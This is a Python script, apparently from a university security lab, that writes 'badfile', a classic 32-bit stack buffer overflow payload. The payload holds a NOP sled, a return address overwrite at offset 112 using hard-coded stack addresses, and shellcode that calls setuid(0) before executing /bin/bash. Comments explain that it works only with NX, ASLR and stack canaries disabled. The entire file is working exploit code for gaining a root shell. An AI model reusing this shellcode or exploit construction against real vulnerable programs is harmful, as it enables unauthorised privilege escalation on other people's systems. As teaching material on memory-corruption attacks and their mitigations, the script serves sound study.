#!/usr/bin/python3
"""Build ``badfile``, a stack-smashing payload for a 32-bit lab target.

The file is laid out as ``NOP sled --- overwritten return address --- shellcode``.
Every value below (offsets, ``addr_ebp``) is hard-coded for one specific
binary and run-time environment; the payload only works where the stack is
executable and stack addresses do not move between runs (i.e. NX and ASLR
are disabled).  Those two mitigations, plus stack canaries, are exactly what
defeats this construction in a hardened build.
"""
shellcode= (
# ----------- setuid(0) ----------------------
# eax = syscall number, ebx = first argument (uid 0).
"\x31\xc0" # xorl %eax,%eax
"\x31\xdb" # xorl %ebx,%ebx
"\xb0\xd5" # movb $0xd5,%al      (0xd5 = 213, i386 setuid32)
"\xcd\x80" # int $0x80
# ----------- execv("/bin/sh") ---------------
# Despite the header, the string pushed below is "/bin////bash", not
# "/bin/sh": the three pushes land on the stack in reverse order, so the
# last push ("/bin") is at the lowest address.  The pushed eax (0) acts as
# the NUL terminator; the "////" padding keeps the path 4-byte aligned
# without introducing a 0x00 in the shellcode.
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax             (NUL terminator for the path)
"\x68""bash" # to execute /bin/bash
"\x68""////" # filler slashes; extra slashes are ignored by the kernel
# "\x68""//sh" # pushl $0x68732f2f   (original /bin//sh variant, left disabled)
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx         (ebx = filename)
"\x50" # pushl %eax             (argv NULL terminator)
"\x53" # pushl %ebx             (argv[0] = filename)
"\x89\xe1" # movl %esp,%ecx         (ecx = argv)
"\x99" # cdq                    (edx = 0 -> envp = NULL)
"\xb0\x0b" # movb $0x0b,%al         (0x0b = 11, i386 execve)
"\xcd\x80" # int $0x80
).encode('latin-1')
# set file size according to buffer size and offset
# Must exceed the target's buffer by enough to cover the saved ebp and
# return address; 300 is a lab-specific choice, not derived here.
file_size=300
# Fill the content with NOPs
# The sled lets an imprecise return address still slide into the shellcode.
content = bytearray(0x90 for i in range(file_size)) # ---NOP---RET---SHELLCODE
# Put the shellcode at the end
start = file_size - len(shellcode)
content[start:] = shellcode
print("shellcode is written after: ", start, " bytes")
# setup return address
# ebp_offset is the distance from the start of the overflowed buffer to the
# saved frame pointer; presumably read off in a debugger on the target —
# TODO confirm, it is valid only for that exact binary/compiler layout.
ebp_offset = 108
return_addr_offset = ebp_offset + 4 # 108=offset of frame pointer so ra @ 112
# Absolute stack address of the saved ebp at run time.  Only meaningful with
# ASLR off; any randomization invalidates it and the overwritten return
# address points into unmapped or wrong memory (crash, not a shell).
addr_ebp = 0xbffff098
# ret = 0xbffff0e8 + 116 #0xbffff07c
# Target somewhere inside the NOP sled above the return address; +116 is
# another lab-tuned constant.  Anywhere between the return slot and
# `start` would work as long as the sled is intact.
ret = addr_ebp + 116 # address of ebp + offset # where to return after
# Put the address at offset 112
# little-endian because the target is i386.
content[return_addr_offset:return_addr_offset+4] = (ret).to_bytes(4, byteorder='little') # jump address is written after 112 NOP slides
#write
with open('badfile', 'wb') as f:
    f.write(content)